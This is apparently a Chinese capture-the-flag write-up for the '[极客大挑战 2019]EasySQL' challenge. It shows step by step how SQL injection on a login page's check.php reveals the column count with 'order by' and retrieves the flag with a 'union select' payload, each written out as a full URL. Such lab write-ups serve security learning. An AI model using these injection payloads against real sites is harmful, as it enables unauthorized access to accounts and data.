[极客大挑战 2019]EasySQL

打开网页,首先就是一个登录页面

F12调出hackbar,随便输入一组账号密码,得到参数名username和password

测试简单的SQL注入的语法,发现存在报错注入,这里可以用"闭合

http://3e86ad91-59c3-419c-8aad-5f6aa522be1f.node3.buuoj.cn/check.php?username=1&password=1%27

通过order by查找有多少字段,当order by参数为3时,页面正常,参数为4时,页面报错,因此可以判断一共有3列

http://3e86ad91-59c3-419c-8aad-5f6aa522be1f.node3.buuoj.cn/check.php?username=1&password=1 order by 3%23

http://3e86ad91-59c3-419c-8aad-5f6aa522be1f.node3.buuoj.cn/check.php?username=1&password=1 order by 4%23

直接通过union select命令拿到flag

http://3e86ad91-59c3-419c-8aad-5f6aa522be1f.node3.buuoj.cn/check.php?username=1&password=1' union select 1,2,3%23

点赞

发表评论

昵称和uid可以选填一个,填邮箱必填(留言回复后将会发邮件给你)
tips:输入uid可以快速获得你的昵称和头像